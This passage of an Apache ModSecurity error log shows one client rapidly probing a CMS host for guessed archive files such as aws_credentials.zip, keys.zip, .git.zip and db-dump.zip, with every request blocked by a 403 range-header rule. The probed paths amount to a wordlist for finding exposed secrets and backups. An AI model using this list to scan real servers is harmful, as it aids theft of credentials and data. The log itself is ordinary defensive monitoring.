"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/bundle.zip"] [unique_id "aa2sKF3UyizU6P-l0YL8_QAAAFA"] [Sun Mar 08 19:04:40.508100 2026] [:error] [pid 11078:tid 11113] [client 35.189.151.148:60184] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-iam.zip"] [unique_id "aa2sKH-dmvIeGeY060kirAAAAcM"] [Sun Mar 08 19:04:40.510191 2026] [:error] [pid 12902:tid 12936] [client 35.189.151.148:60680] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive_3.zip"] [unique_id "aa2sKGaTUOdovAC89_RAuQAAAoE"] [Sun Mar 08 19:04:40.510205 2026] [:error] [pid 11078:tid 11128] [client 35.189.151.148:60220] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_credentials.zip"] [unique_id "aa2sKH-dmvIeGeY060kirQAAAdI"] [Sun Mar 08 19:04:40.510326 2026] [:error] [pid 13605:tid 13624] [client 35.189.151.148:59856] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/clients.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfuAAAANE"] [Sun Mar 08 19:04:40.510323 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:60260] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/keys.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4MgAAABM"] [Sun Mar 08 19:04:40.511074 2026] [:error] [pid 13472:tid 13537] [client 35.189.151.148:60758] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/january.zip"] [unique_id "aa2sKF3UyizU6P-l0YL8_gAAAFU"] [Sun Mar 08 19:04:40.512330 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:60338] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/elasticsearch.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4MwAAABE"] [Sun Mar 08 19:04:40.513311 2026] [:error] [pid 13471:tid 13478] [client 35.189.151.148:59968] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/production_build.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4NAAAAAM"] [Sun Mar 08 19:04:40.514384 2026] [:error] [pid 13473:tid 13534] [client 35.189.151.148:60080] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/presentation_files.zip"] [unique_id "aa2sKEwwZGElJGd8aN_6KAAAAIs"] [Sun Mar 08 19:04:40.514454 2026] [:error] [pid 13471:tid 13479] [client 35.189.151.148:60172] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_vpc.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4NQAAAAQ"] [Sun Mar 08 19:04:40.514508 2026] [:error] [pid 7010:tid 7042] [client 35.189.151.148:32852] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-dgAAAYU"] [Sun Mar 08 19:04:40.520835 2026] [:error] [pid 13471:tid 13477] [client 35.189.151.148:60782] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/log.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4NgAAAAI"] [Sun Mar 08 19:04:40.529162 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:40954] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/hostgator.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4NwAAAA4"] [Sun Mar 08 19:04:40.723748 2026] [:error] [pid 11078:tid 11114] [client 35.189.151.148:41730] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/import.zip"] [unique_id "aa2sKH-dmvIeGeY060kirgAAAcQ"] [Sun Mar 08 19:04:40.723749 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:38160] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/html-backup.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4OgAAABA"] [Sun Mar 08 19:04:40.723750 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:38502] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/site-archive.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4OQAAAA8"] [Sun Mar 08 19:04:40.724490 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:40508] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/azure.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4OwAAAAY"] [Sun Mar 08 19:04:40.724531 2026] [:error] [pid 27307:tid 27329] [client 35.189.151.148:37680] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mssql.zip"] [unique_id "aa2sKAo1nI2o7tYBWw9SZwAAAVQ"] [Sun Mar 08 19:04:40.724553 2026] [:error] [pid 13605:tid 13631] [client 35.189.151.148:39684] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/previous-version.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfuQAAANg"] [Sun Mar 08 19:04:40.724831 2026] [:error] [pid 29564:tid 29592] [client 35.189.151.148:41982] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/webservice.zip"] [unique_id "aa2sKAemqWLB0zKFm0TYUAAAARQ"] [Sun Mar 08 19:04:40.725832 2026] [:error] [pid 7010:tid 7044] [client 35.189.151.148:37828] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/apr.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-dwAAAYc"] [Sun Mar 08 19:04:40.726833 2026] [:error] [pid 13471:tid 13483] [client 35.189.151.148:38046] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/application-backup.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4PAAAAAg"] [Sun Mar 08 19:04:40.727992 2026] [:error] [pid 7010:tid 7037] [client 35.189.151.148:43440] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/confidential.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-eAAAAYA"] [Sun Mar 08 19:04:40.727991 2026] [:error] [pid 13471:tid 13486] [client 35.189.151.148:40988] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/Archive.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4PQAAAAs"] [Sun Mar 08 19:04:40.728051 2026] [:error] [pid 13605:tid 13626] [client 35.189.151.148:41400] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/_new.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfugAAANM"] [Sun Mar 08 19:04:40.728904 2026] [:error] [pid 13472:tid 13506] [client 35.189.151.148:39888] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/js.zip"] [unique_id "aa2sKF3UyizU6P-l0YL8_wAAAEQ"] [Sun Mar 08 19:04:40.728990 2026] [:error] [pid 13471:tid 13488] [client 35.189.151.148:39740] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/etc.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4PgAAAA0"] [Sun Mar 08 19:04:40.730294 2026] [:error] [pid 13472:tid 13516] [client 35.189.151.148:37324] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/upgrade.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9AAAAAEs"] [Sun Mar 08 19:04:40.730305 2026] [:error] [pid 27307:tid 27310] [client 35.189.151.148:38030] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/setup.zip"] [unique_id "aa2sKAo1nI2o7tYBWw9SaAAAAUE"] [Sun Mar 08 19:04:40.730385 2026] [:error] [pid 13605:tid 13630] [client 35.189.151.148:38892] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_infrastructure.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfuwAAANc"] [Sun Mar 08 19:04:40.731089 2026] [:error] [pid 12902:tid 12941] [client 35.189.151.148:38824] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/domain.zip"] [unique_id "aa2sKGaTUOdovAC89_RAugAAAoY"] [Sun Mar 08 19:04:40.731113 2026] [:error] [pid 13472:tid 13512] [client 35.189.151.148:37392] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/web_archive.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9AQAAAEk"] [Sun Mar 08 19:04:40.731134 2026] [:error] [pid 13472:tid 13519] [client 35.189.151.148:38080] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-iam-roles.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9AgAAAE0"] [Sun Mar 08 19:04:40.731191 2026] [:error] [pid 11078:tid 11119] [client 35.189.151.148:37246] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/9.zip"] [unique_id "aa2sKH-dmvIeGeY060kirwAAAck"] [Sun Mar 08 19:04:40.731219 2026] [:error] [pid 13605:tid 13609] [client 35.189.151.148:40752] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sessions.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfvAAAAMI"] [Sun Mar 08 19:04:40.732684 2026] [:error] [pid 13472:tid 13532] [client 35.189.151.148:40364] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-credentials.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9AwAAAFM"] [Sun Mar 08 19:04:40.732697 2026] [:error] [pid 11078:tid 11130] [client 35.189.151.148:39672] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/alpha.zip"] [unique_id "aa2sKH-dmvIeGeY060kisAAAAdQ"] [Sun Mar 08 19:04:40.732753 2026] [:error] [pid 13605:tid 13616] [client 35.189.151.148:43858] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mysql-backup.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfvQAAAMk"] [Sun Mar 08 19:04:40.733264 2026] [:error] [pid 29564:tid 29578] [client 35.189.151.148:43208] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_data.zip"] [unique_id "aa2sKAemqWLB0zKFm0TYUQAAAQY"] [Sun Mar 08 19:04:40.733339 2026] [:error] [pid 13472:tid 13544] [client 35.189.151.148:43630] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/db-dump.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9BAAAAFg"] [Sun Mar 08 19:04:40.733450 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:40996] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 